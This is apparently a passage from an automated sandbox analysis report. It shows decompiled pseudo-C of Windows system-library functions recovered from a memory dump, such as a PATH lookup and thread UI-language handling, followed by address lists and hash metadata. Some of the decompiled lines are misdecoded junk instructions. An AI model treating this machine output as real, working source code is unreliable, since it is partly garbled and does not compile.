                                                                        									__eax = __ax & 0x0000ffff;
                                                                        									__ebx = __ebx + 2;
                                                                        									__eflags = __ebx;
                                                                        									goto L53;
                                                                        								}
                                                                        								goto L14;
                                                                        							case 1:
                                                                        								L44:
                                                                        								_t313 =  &_v64;
                                                                        								_v80 = E01502E3E(0,  &_v64);
                                                                        								_t283 = _t283 + _v64 + 2;
                                                                        								goto L13;
                                                                        							case 2:
                                                                        								__eax =  *0x15c8480 & 0x0000ffff;
                                                                        								__ebx = __ebx + __eax;
                                                                        								__eflags = __dl;
                                                                        								if(__dl != 0) {
                                                                        									__eax = 0x15c8480;
                                                                        									goto L80;
                                                                        								}
                                                                        								goto L14;
                                                                        							case 3:
                                                                        								__eax = E014EEEF0(0x15c79a0);
                                                                        								__eax =  &_v44;
                                                                        								_push(__eax);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_push(4);
                                                                        								_push(L"PATH");
                                                                        								_push(0);
                                                                        								L57();
                                                                        								__esi = __eax;
                                                                        								_v68 = __esi;
                                                                        								__eflags = __esi - 0xc0000023;
                                                                        								if(__esi != 0xc0000023) {
                                                                        									L10:
                                                                        									__eax = E014EEB70(__ecx, 0x15c79a0);
                                                                        									__eflags = __esi - 0xc0000100;
                                                                        									if(__esi == 0xc0000100) {
                                                                        										_v44 = _v44 & 0x00000000;
                                                                        										__eax = 0;
                                                                        										_v68 = 0;
                                                                        										goto L13;
                                                                        									} else {
                                                                        										__eflags = __esi;
                                                                        										if(__esi < 0) {
                                                                        											L32:
                                                                        											_t221 = _v72;
                                                                        											__eflags = _t221;
                                                                        											if(_t221 != 0) {
                                                                        												L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
                                                                        											}
                                                                        											_t222 = _v52;
                                                                        											__eflags = _t222;
                                                                        											if(_t222 != 0) {
                                                                        												__eflags = _t332;
                                                                        												if(_t332 < 0) {
                                                                        													L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
                                                                        													_t222 = 0;
                                                                        												}
                                                                        											}
                                                                        											goto L36;
                                                                        										} else {
                                                                        											__eax = _v44;
                                                                        											__ebx = __ebx + __eax * 2;
                                                                        											__ebx = __ebx + 2;
                                                                        											__eflags = __ebx;
                                                                        											L13:
                                                                        											_t293 = _v36;
                                                                        											goto L14;
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									__eax = _v44;
                                                                        									__ecx =  *0x15c7b9c; // 0x0
                                                                        									_v44 + _v44 =  *[fs:0x30];
                                                                        									__ecx = __ecx + 0x180000;
                                                                        									__eax = L014F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                        									_v72 = __eax;
                                                                        									__eflags = __eax;
                                                                        									if(__eax == 0) {
                                                                        										__eax = E014EEB70(__ecx, 0x15c79a0);
                                                                        										__eax = _v52;
                                                                        										L36:
                                                                        										_pop(_t325);
                                                                        										_pop(_t333);
                                                                        										__eflags = _v8 ^ _t338;
                                                                        										_pop(_t284);
                                                                        										return E0151B640(_t222, _t284, _v8 ^ _t338, _t313, _t325, _t333);
                                                                        									} else {
                                                                        										__ecx =  &_v44;
                                                                        										_push(__ecx);
                                                                        										_push(_v44);
                                                                        										_push(__eax);
                                                                        										_push(4);
                                                                        										_push(L"PATH");
                                                                        										_push(0);
                                                                        										L57();
                                                                        										__esi = __eax;
                                                                        										_v68 = __eax;
                                                                        										goto L10;
                                                                        									}
                                                                        								}
                                                                        								goto L108;
                                                                        							case 4:
                                                                        								__ebx = __ebx + 4;
                                                                        								goto L14;
                                                                        							case 5:
                                                                        								_t279 = _v56;
                                                                        								if(_v56 != 0) {
                                                                        									_t313 =  &_v36;
                                                                        									_t281 = E01502E3E(_t279,  &_v36);
                                                                        									_t293 = _v36;
                                                                        									_v76 = _t281;
                                                                        								}
                                                                        								if(_t293 == 0) {
                                                                        									goto L44;
                                                                        								} else {
                                                                        									_t283 = _t283 + 2 + _t293;
                                                                        								}
                                                                        								goto L14;
                                                                        							case 6:
                                                                        								__eax =  *0x15c5764 & 0x0000ffff;
                                                                        								goto L53;
                                                                        							case 7:
                                                                        								__eax =  *0x15c8478 & 0x0000ffff;
                                                                        								__ebx = __ebx + __eax;
                                                                        								__eflags = _a8;
                                                                        								if(_a8 != 0) {
                                                                        									__ebx = __ebx + 0x16;
                                                                        									__ebx = __ebx + __eax;
                                                                        								}
                                                                        								__eflags = __dl;
                                                                        								if(__dl != 0) {
                                                                        									__eax = 0x15c8478;
                                                                        									L80:
                                                                        									_v32 = __eax;
                                                                        								}
                                                                        								goto L14;
                                                                        							case 8:
                                                                        								__eax =  *0x15c6e58 & 0x0000ffff;
                                                                        								__eax = ( *0x15c6e58 & 0x0000ffff) + 2;
                                                                        								L53:
                                                                        								__ebx = __ebx + __eax;
                                                                        								L14:
                                                                        								_t324 = _t324 + 1;
                                                                        								if(_t324 >= _v48) {
                                                                        									goto L16;
                                                                        								} else {
                                                                        									_t313 = _v37;
                                                                        									goto L1;
                                                                        								}
                                                                        								goto L108;
                                                                        						}
                                                                        					}
                                                                        					L56:
                                                                        					_t298 = 0x25;
                                                                        					asm("int 0x29");
                                                                        					asm("out 0x28, al");
                                                                        					_push(_t247);
                                                                        					 *((intOrPtr*)(_t331 + 0x28)) =  *((intOrPtr*)(_t331 + 0x28)) + _t342;
                                                                        					_push(_t247);
                                                                        					_t248 = _t247 + _t342;
                                                                        					asm("daa");
                                                                        					_push(_t248);
                                                                        					 *_t331 =  *_t331 + _t338;
                                                                        					_push(_t248);
                                                                        					 *((intOrPtr*)(_t331 + 0x28)) =  *((intOrPtr*)(_t331 + 0x28)) + _t248;
                                                                        					 *0x1f015026 =  *0x1f015026 + _t248;
                                                                        					_t288 = _t248;
                                                                        					_push(_t342);
                                                                        					 *((intOrPtr*)(_t248 +  &_a1530200396)) =  *((intOrPtr*)(_t248 +  &_a1530200396)) + _t313;
                                                                        					_push(_t342);
                                                                        					 *_t313 =  *_t313 + _t248;
                                                                        					 *((intOrPtr*)(_t248 + 1)) =  *((intOrPtr*)(_t248 + 1)) - _t313;
                                                                        					 *_t248 =  *_t248 - 0x50;
                                                                        					_t334 = _t331 + _t331;
                                                                        					asm("daa");
                                                                        					_push(_t248);
                                                                        					 *_t334 =  *_t334 + _t288;
                                                                        					 *((intOrPtr*)(_t248 + 1)) =  *((intOrPtr*)(_t248 + 1)) - _t313;
                                                                        					_t335 = _t334 - 1;
                                                                        					 *((intOrPtr*)(_t248 + 1)) =  *((intOrPtr*)(_t248 + 1)) - _t313;
                                                                        					asm("daa");
                                                                        					_t289 = _t248;
                                                                        					_push(_t342);
                                                                        					 *((intOrPtr*)(_t248 + _t288 +  &_a1546912076)) =  *((intOrPtr*)(_t248 + _t288 +  &_a1546912076)) + _t334 - 1;
                                                                        					_push(_t342);
                                                                        					_t344 = _t342 + _t298;
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					asm("int3");
                                                                        					_push(0x20);
                                                                        					_push(0x15aff00);
                                                                        					E0152D08C(_t289, _t326, _t335);
                                                                        					_v44 =  *[fs:0x18];
                                                                        					_t327 = 0;
                                                                        					 *_a24 = 0;
                                                                        					_t290 = _a12;
                                                                        					__eflags = _t290;
                                                                        					if(_t290 == 0) {
                                                                        						_t252 = 0xc0000100;
                                                                        					} else {
                                                                        						_v8 = 0;
                                                                        						_t336 = 0xc0000100;
                                                                        						_v52 = 0xc0000100;
                                                                        						_t254 = 4;
                                                                        						while(1) {
                                                                        							_v40 = _t254;
                                                                        							__eflags = _t254;
                                                                        							if(_t254 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t303 = _t254 * 0xc;
                                                                        							_v48 = _t303;
                                                                        							__eflags = _t290 -  *((intOrPtr*)(_t303 + 0x14b1664));
                                                                        							if(__eflags <= 0) {
                                                                        								if(__eflags == 0) {
                                                                        									_t269 = E0151E5C0(_a8,  *((intOrPtr*)(_t303 + 0x14b1668)), _t290);
                                                                        									_t344 = _t344 + 0xc;
                                                                        									__eflags = _t269;
                                                                        									if(__eflags == 0) {
                                                                        										_t336 = E015551BE(_t290,  *((intOrPtr*)(_v48 + 0x14b166c)), _a16, _t327, _t336, __eflags, _a20, _a24);
                                                                        										_v52 = _t336;
                                                                        										break;
                                                                        									} else {
                                                                        										_t254 = _v40;
                                                                        										goto L62;
                                                                        									}
                                                                        									goto L70;
                                                                        								} else {
                                                                        									L62:
                                                                        									_t254 = _t254 - 1;
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						_v32 = _t336;
                                                                        						__eflags = _t336;
                                                                        						if(_t336 < 0) {
                                                                        							__eflags = _t336 - 0xc0000100;
                                                                        							if(_t336 == 0xc0000100) {
                                                                        								_t299 = _a4;
                                                                        								__eflags = _t299;
                                                                        								if(_t299 != 0) {
                                                                        									_v36 = _t299;
                                                                        									__eflags =  *_t299 - _t327;
                                                                        									if( *_t299 == _t327) {
                                                                        										_t336 = 0xc0000100;
                                                                        										goto L76;
                                                                        									} else {
                                                                        										_t315 =  *((intOrPtr*)(_v44 + 0x30));
                                                                        										_t256 =  *((intOrPtr*)(_t315 + 0x10));
                                                                        										__eflags =  *((intOrPtr*)(_t256 + 0x48)) - _t299;
                                                                        										if( *((intOrPtr*)(_t256 + 0x48)) == _t299) {
                                                                        											__eflags =  *(_t315 + 0x1c);
                                                                        											if( *(_t315 + 0x1c) == 0) {
                                                                        												L106:
                                                                        												_t336 = E01502AE4( &_v36, _a8, _t290, _a16, _a20, _a24);
                                                                        												_v32 = _t336;
                                                                        												__eflags = _t336 - 0xc0000100;
                                                                        												if(_t336 != 0xc0000100) {
                                                                        													goto L69;
                                                                        												} else {
                                                                        													_t327 = 1;
                                                                        													_t299 = _v36;
                                                                        													goto L75;
                                                                        												}
                                                                        											} else {
                                                                        												_t259 = E014E6600( *(_t315 + 0x1c));
                                                                        												__eflags = _t259;
                                                                        												if(_t259 != 0) {
                                                                        													goto L106;
                                                                        												} else {
                                                                        													_t299 = _a4;
                                                                        													goto L75;
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											L75:
                                                                        											_t336 = E01502C50(_t299, _a8, _t290, _a16, _a20, _a24, _t327);
                                                                        											L76:
                                                                        											_v32 = _t336;
                                                                        											goto L69;
                                                                        										}
                                                                        									}
                                                                        									goto L108;
                                                                        								} else {
                                                                        									E014EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                        									_v8 = 1;
                                                                        									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                        									_t336 = _a24;
                                                                        									_t266 = E01502AE4( &_v36, _a8, _t290, _a16, _a20, _t336);
                                                                        									_v32 = _t266;
                                                                        									__eflags = _t266 - 0xc0000100;
                                                                        									if(_t266 == 0xc0000100) {
                                                                        										_v32 = E01502C50(_v36, _a8, _t290, _a16, _a20, _t336, 1);
                                                                        									}
                                                                        									_v8 = _t327;
                                                                        									E01502ACB();
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L69:
                                                                        						_v8 = 0xfffffffe;
                                                                        						_t252 = _t336;
                                                                        					}
                                                                        					L70:
                                                                        					return E0152D0D1(_t252);
                                                                        				}
                                                                        				L108:
                                                                        			}

                                                                        0x0150276e
                                                                        0x01502773
                                                                        0x01502773
                                                                        0x01502776
                                                                        0x01502778
                                                                        0x0150277e
                                                                        0x0150277e
                                                                        0x01502781
                                                                        0x01502781
                                                                        0x01502783
                                                                        0x01502784
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01545bd8
                                                                        0x01545bde
                                                                        0x01545be4
                                                                        0x01545be6
                                                                        0x01545be8
                                                                        0x01545be9
                                                                        0x01545bee
                                                                        0x01545bf8
                                                                        0x01545bff
                                                                        0x01545c01
                                                                        0x01545c04
                                                                        0x01545c07
                                                                        0x01545c0b
                                                                        0x01545c0d
                                                                        0x01545c0d
                                                                        0x01545c15
                                                                        0x01545c18
                                                                        0x01545c1b
                                                                        0x01545c1b
                                                                        0x01545c1e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015028c3
                                                                        0x015028c8
                                                                        0x015028d2
                                                                        0x015028d4
                                                                        0x015028d8
                                                                        0x015028db
                                                                        0x01545c26
                                                                        0x01545c28
                                                                        0x01545c2d
                                                                        0x01545c2d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01545c34
                                                                        0x01545c36
                                                                        0x01545c49
                                                                        0x01545c4e
                                                                        0x01545c54
                                                                        0x01545c5b
                                                                        0x01545c5d
                                                                        0x01545c60
                                                                        0x01502788
                                                                        0x01502788
                                                                        0x0150278b
                                                                        0x0150278e
                                                                        0x0150278e
                                                                        0x0150278e
                                                                        0x01502791
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502756
                                                                        0x01502750
                                                                        0x00000000
                                                                        0x01502794
                                                                        0x01502794
                                                                        0x01502795
                                                                        0x01502798
                                                                        0x01502798
                                                                        0x00000000
                                                                        0x01502734
                                                                        0x0150272c
                                                                        0x01502700
                                                                        0x015025ef
                                                                        0x015025ef
                                                                        0x015025ef
                                                                        0x015025f2
                                                                        0x015025f8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015025fe
                                                                        0x00000000
                                                                        0x015028e6
                                                                        0x015028ec
                                                                        0x015028ef
                                                                        0x015028f5
                                                                        0x015028f8
                                                                        0x015028f8
                                                                        0x00000000
                                                                        0x015028f8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502866
                                                                        0x01502866
                                                                        0x01502876
                                                                        0x01502879
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015027e0
                                                                        0x015027e7
                                                                        0x015027e9
                                                                        0x015027eb
                                                                        0x01545afd
                                                                        0x00000000
                                                                        0x01545afd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502633
                                                                        0x01502638
                                                                        0x0150263b
                                                                        0x0150263c
                                                                        0x0150263e
                                                                        0x01502640
                                                                        0x01502642
                                                                        0x01502647
                                                                        0x01502649
                                                                        0x0150264e
                                                                        0x01502650
                                                                        0x01502653
                                                                        0x01502659
                                                                        0x015026a2
                                                                        0x015026a7
                                                                        0x015026ac
                                                                        0x015026b2
                                                                        0x01545b11
                                                                        0x01545b15
                                                                        0x01545b17
                                                                        0x00000000
                                                                        0x015026b8
                                                                        0x015026b8
                                                                        0x015026ba
                                                                        0x015027a6
                                                                        0x015027a6
                                                                        0x015027a9
                                                                        0x015027ab
                                                                        0x015027b9
                                                                        0x015027b9
                                                                        0x015027be
                                                                        0x015027c1
                                                                        0x015027c3
                                                                        0x015027c5
                                                                        0x015027c7
                                                                        0x01545c74
                                                                        0x01545c79
                                                                        0x01545c79
                                                                        0x015027c7
                                                                        0x00000000
                                                                        0x015026c0
                                                                        0x015026c0
                                                                        0x015026c3
                                                                        0x015026c6
                                                                        0x015026c6
                                                                        0x015026c9
                                                                        0x015026c9
                                                                        0x00000000
                                                                        0x015026c9
                                                                        0x015026ba
                                                                        0x0150265b
                                                                        0x0150265b
                                                                        0x0150265e
                                                                        0x01502667
                                                                        0x0150266d
                                                                        0x01502677
                                                                        0x0150267c
                                                                        0x0150267f
                                                                        0x01502681
                                                                        0x01545b49
                                                                        0x01545b4e
                                                                        0x015027cd
                                                                        0x015027d0
                                                                        0x015027d1
                                                                        0x015027d2
                                                                        0x015027d4
                                                                        0x015027dd
                                                                        0x01502687
                                                                        0x01502687
                                                                        0x0150268a
                                                                        0x0150268b
                                                                        0x0150268e
                                                                        0x0150268f
                                                                        0x01502691
                                                                        0x01502696
                                                                        0x01502698
                                                                        0x0150269d
                                                                        0x0150269f
                                                                        0x00000000
                                                                        0x0150269f
                                                                        0x01502681
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502846
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502605
                                                                        0x0150260a
                                                                        0x0150260c
                                                                        0x01502611
                                                                        0x01502616
                                                                        0x01502619
                                                                        0x01502619
                                                                        0x0150261e
                                                                        0x00000000
                                                                        0x01502624
                                                                        0x01502627
                                                                        0x01502627
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01545b1f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502894
                                                                        0x0150289b
                                                                        0x0150289d
                                                                        0x015028a1
                                                                        0x01545b2b
                                                                        0x01545b2e
                                                                        0x01545b2e
                                                                        0x015028a7
                                                                        0x015028a9
                                                                        0x01545b04
                                                                        0x01545b09
                                                                        0x01545b09
                                                                        0x01545b09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01545b35
                                                                        0x01545b3c
                                                                        0x015028fb
                                                                        0x015028fb
                                                                        0x015026cc
                                                                        0x015026cc
                                                                        0x015026d0
                                                                        0x00000000
                                                                        0x015026d2
                                                                        0x015026d2
                                                                        0x00000000
                                                                        0x015026d2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015025fe
                                                                        0x0150292d
                                                                        0x0150292f
                                                                        0x01502930
                                                                        0x01502935
                                                                        0x01502937
                                                                        0x01502938
                                                                        0x0150293b
                                                                        0x0150293c
                                                                        0x0150293e
                                                                        0x0150293f
                                                                        0x01502940
                                                                        0x01502942
                                                                        0x01502944
                                                                        0x01502948
                                                                        0x0150294e
                                                                        0x0150294f
                                                                        0x01502950
                                                                        0x01502957
                                                                        0x01502958
                                                                        0x0150295a
                                                                        0x0150295d
                                                                        0x01502960
                                                                        0x01502962
                                                                        0x01502963
                                                                        0x01502964
                                                                        0x01502966
                                                                        0x01502969
                                                                        0x0150296a
                                                                        0x0150296e
                                                                        0x01502972
                                                                        0x01502973
                                                                        0x01502974
                                                                        0x0150297b
                                                                        0x0150297c
                                                                        0x0150297e
                                                                        0x0150297f
                                                                        0x01502980
                                                                        0x01502981
                                                                        0x01502982
                                                                        0x01502983
                                                                        0x01502984
                                                                        0x01502985
                                                                        0x01502986
                                                                        0x01502987
                                                                        0x01502988
                                                                        0x01502989
                                                                        0x0150298a
                                                                        0x0150298b
                                                                        0x0150298c
                                                                        0x0150298d
                                                                        0x0150298e
                                                                        0x0150298f
                                                                        0x01502990
                                                                        0x01502992
                                                                        0x01502997
                                                                        0x015029a3
                                                                        0x015029a6
                                                                        0x015029ab
                                                                        0x015029ad
                                                                        0x015029b0
                                                                        0x015029b2
                                                                        0x01545c80
                                                                        0x015029b8
                                                                        0x015029b8
                                                                        0x015029bb
                                                                        0x015029c0
                                                                        0x015029c5
                                                                        0x015029c6
                                                                        0x015029c6
                                                                        0x015029c9
                                                                        0x015029cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015029cd
                                                                        0x015029d0
                                                                        0x015029d9
                                                                        0x015029db
                                                                        0x015029dd
                                                                        0x01502a7f
                                                                        0x01502a84
                                                                        0x01502a87
                                                                        0x01502a89
                                                                        0x01545ca1
                                                                        0x01545ca3
                                                                        0x00000000
                                                                        0x01502a8f
                                                                        0x01502a8f
                                                                        0x00000000
                                                                        0x01502a8f
                                                                        0x00000000
                                                                        0x015029e3
                                                                        0x015029e3
                                                                        0x015029e3

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PATH
                                                                        • API String ID: 0-1036084923
                                                                        • Opcode ID: 700642d8b6c2b69d950cc4acdef1e0730083e0d456589de5435fabf97630cd5f
                                                                        • Instruction ID: a9d3254c120e6a73cd813b4e99c01b04e8b70d01cdc5b8ac51149302586a1ce2
                                                                        • Opcode Fuzzy Hash: 700642d8b6c2b69d950cc4acdef1e0730083e0d456589de5435fabf97630cd5f
                                                                        • Instruction Fuzzy Hash: 38C1AE71D0021ADFDB26DF99C884ABEBBF5FF48700F18442AE505AF290E734A945CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E0150FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                        				char _v5;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v16;
                                                                        				char _v17;
                                                                        				char _v20;
                                                                        				signed int _v24;
                                                                        				char _v28;
                                                                        				char _v32;
                                                                        				signed int _v40;
                                                                        				void* __ecx;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				signed int _t73;
                                                                        				intOrPtr* _t75;
                                                                        				signed int _t77;
                                                                        				signed int _t79;
                                                                        				signed int _t81;
                                                                        				intOrPtr _t83;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr _t86;
                                                                        				signed int _t91;
                                                                        				signed int _t94;
                                                                        				signed int _t95;
                                                                        				signed int _t96;
                                                                        				signed int _t106;
                                                                        				signed int _t108;
                                                                        				signed int _t114;
                                                                        				signed int _t116;
                                                                        				signed int _t118;
                                                                        				signed int _t122;
                                                                        				signed int _t123;
                                                                        				void* _t129;
                                                                        				signed int _t130;
                                                                        				void* _t132;
                                                                        				intOrPtr* _t134;
                                                                        				signed int _t138;
                                                                        				signed int _t141;
                                                                        				signed int _t147;
                                                                        				intOrPtr _t153;
                                                                        				signed int _t154;
                                                                        				signed int _t155;
                                                                        				signed int _t170;
                                                                        				void* _t174;
                                                                        				signed int _t176;
                                                                        				signed int _t177;
                                                                        
                                                                        				_t129 = __ebx;
                                                                        				_push(_t132);
                                                                        				_push(__esi);
                                                                        				_t174 = _t132;
                                                                        				_t73 =  !( *( *(_t174 + 0x18)));
                                                                        				if(_t73 >= 0) {
                                                                        					L5:
                                                                        					return _t73;
                                                                        				} else {
                                                                        					E014EEEF0(0x15c7b60);
                                                                        					_t134 =  *0x15c7b84; // 0x771c7b80
                                                                        					_t2 = _t174 + 0x24; // 0x24
                                                                        					_t75 = _t2;
                                                                        					if( *_t134 != 0x15c7b80) {
                                                                        						_push(3);
                                                                        						asm("int 0x29");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						asm("int3");
                                                                        						_push(0x15c7b60);
                                                                        						_t170 = _v8;
                                                                        						_v28 = 0;
                                                                        						_v40 = 0;
                                                                        						_v24 = 0;
                                                                        						_v17 = 0;
                                                                        						_v32 = 0;
                                                                        						__eflags = _t170 & 0xffff7cf2;
                                                                        						if((_t170 & 0xffff7cf2) != 0) {
                                                                        							L43:
                                                                        							_t77 = 0xc000000d;
                                                                        						} else {
                                                                        							_t79 = _t170 & 0x0000000c;
                                                                        							__eflags = _t79;
                                                                        							if(_t79 != 0) {
                                                                        								__eflags = _t79 - 0xc;
                                                                        								if(_t79 == 0xc) {
                                                                        									goto L43;
                                                                        								} else {
                                                                        									goto L9;
                                                                        								}
                                                                        							} else {
                                                                        								_t170 = _t170 | 0x00000008;
                                                                        								__eflags = _t170;
                                                                        								L9:
                                                                        								_t81 = _t170 & 0x00000300;
                                                                        								__eflags = _t81 - 0x300;
                                                                        								if(_t81 == 0x300) {
                                                                        									goto L43;
                                                                        								} else {
                                                                        									_t138 = _t170 & 0x00000001;
                                                                        									__eflags = _t138;
                                                                        									_v24 = _t138;
                                                                        									if(_t138 != 0) {
                                                                        										__eflags = _t81;
                                                                        										if(_t81 != 0) {
                                                                        											goto L43;
                                                                        										} else {
                                                                        											goto L11;
                                                                        										}
                                                                        									} else {
                                                                        										L11:
                                                                        										_push(_t129);
                                                                        										_t77 = E014E6D90( &_v20);
                                                                        										_t130 = _t77;
                                                                        										__eflags = _t130;
                                                                        										if(_t130 >= 0) {
                                                                        											_push(_t174);
                                                                        											__eflags = _t170 & 0x00000301;
                                                                        											if((_t170 & 0x00000301) == 0) {
                                                                        												_t176 = _a8;
                                                                        												__eflags = _t176;
                                                                        												if(__eflags == 0) {
                                                                        													L64:
                                                                        													_t83 =  *[fs:0x18];
                                                                        													_t177 = 0;
                                                                        													__eflags =  *(_t83 + 0xfb8);
                                                                        													if( *(_t83 + 0xfb8) != 0) {
                                                                        														E014E76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                        														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                        													}
                                                                        													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                        													goto L15;
                                                                        												} else {
                                                                        													asm("sbb edx, edx");
                                                                        													_t114 = E01578938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                        													__eflags = _t114;
                                                                        													if(_t114 < 0) {
                                                                        														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                        														E014DB150();
                                                                        													}
                                                                        													_t116 = E01576D81(_t176,  &_v16);
                                                                        													__eflags = _t116;
                                                                        													if(_t116 >= 0) {
                                                                        														__eflags = _v16 - 2;
                                                                        														if(_v16 < 2) {
                                                                        															L56:
                                                                        															_t118 = E014E75CE(_v20, 5, 0);
                                                                        															__eflags = _t118;
                                                                        															if(_t118 < 0) {
                                                                        																L67:
                                                                        																_t130 = 0xc0000017;
                                                                        																goto L32;
                                                                        															} else {
                                                                        																__eflags = _v12;
                                                                        																if(_v12 == 0) {
                                                                        																	goto L67;
                                                                        																} else {
                                                                        																	_t153 =  *0x15c8638; // 0x0
                                                                        																	_t122 = L014E38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                        																	_t154 = _v12;
                                                                        																	_t130 = _t122;
                                                                        																	__eflags = _t130;
                                                                        																	if(_t130 >= 0) {
                                                                        																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                        																		__eflags = _t123;
                                                                        																		if(_t123 != 0) {
                                                                        																			_t155 = _a12;
                                                                        																			__eflags = _t155;
                                                                        																			if(_t155 != 0) {
                                                                        																				 *_t155 = _t123;
                                                                        																			}
                                                                        																			goto L64;
                                                                        																		} else {
                                                                        																			E014E76E2(_t154);
                                                                        																			goto L41;
                                                                        																		}
                                                                        																	} else {
                                                                        																		E014E76E2(_t154);
                                                                        																		_t177 = 0;
                                                                        																		goto L18;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														} else {
                                                                        															__eflags =  *_t176;
                                                                        															if( *_t176 != 0) {
                                                                        																goto L56;
                                                                        															} else {
                                                                        																__eflags =  *(_t176 + 2);
                                                                        																if( *(_t176 + 2) == 0) {
                                                                        																	goto L64;
                                                                        																} else {
                                                                        																	goto L56;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														_t130 = 0xc000000d;
                                                                        														goto L32;
                                                                        													}
                                                                        												}
                                                                        												goto L35;
                                                                        											} else {
                                                                        												__eflags = _a8;
                                                                        												if(_a8 != 0) {
                                                                        													_t77 = 0xc000000d;
                                                                        												} else {
                                                                        													_v5 = 1;
                                                                        													L0150FCE3(_v20, _t170);
                                                                        													_t177 = 0;
                                                                        													__eflags = 0;
                                                                        													L15:
                                                                        													_t85 =  *[fs:0x18];
                                                                        													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                        													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                        														L18:
                                                                        														__eflags = _t130;
                                                                        														if(_t130 != 0) {
                                                                        															goto L32;
                                                                        														} else {
                                                                        															__eflags = _v5 - _t130;
                                                                        															if(_v5 == _t130) {
                                                                        																goto L32;
                                                                        															} else {
                                                                        																_t86 =  *[fs:0x18];
                                                                        																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                        																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                        																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                        																}
                                                                        																__eflags = _t177;
                                                                        																if(_t177 == 0) {
                                                                        																	L31:
                                                                        																	__eflags = 0;
                                                                        																	L014E70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                        																	goto L32;
                                                                        																} else {
                                                                        																	__eflags = _v24;
                                                                        																	_t91 =  *(_t177 + 0x20);
                                                                        																	if(_v24 != 0) {
                                                                        																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                        																		goto L31;
                                                                        																	} else {
                                                                        																		_t141 = _t91 & 0x00000040;
                                                                        																		__eflags = _t170 & 0x00000100;
                                                                        																		if((_t170 & 0x00000100) == 0) {
                                                                        																			__eflags = _t141;
                                                                        																			if(_t141 == 0) {
                                                                        																				L74:
                                                                        																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                        																				goto L27;
                                                                        																			} else {
                                                                        																				_t177 = E0150FD22(_t177);
                                                                        																				__eflags = _t177;
                                                                        																				if(_t177 == 0) {
                                                                        																					goto L42;
                                                                        																				} else {
                                                                        																					_t130 = E0150FD9B(_t177, 0, 4);
                                                                        																					__eflags = _t130;
                                                                        																					if(_t130 != 0) {
                                                                        																						goto L42;
                                                                        																					} else {
                                                                        																						_t68 = _t177 + 0x20;
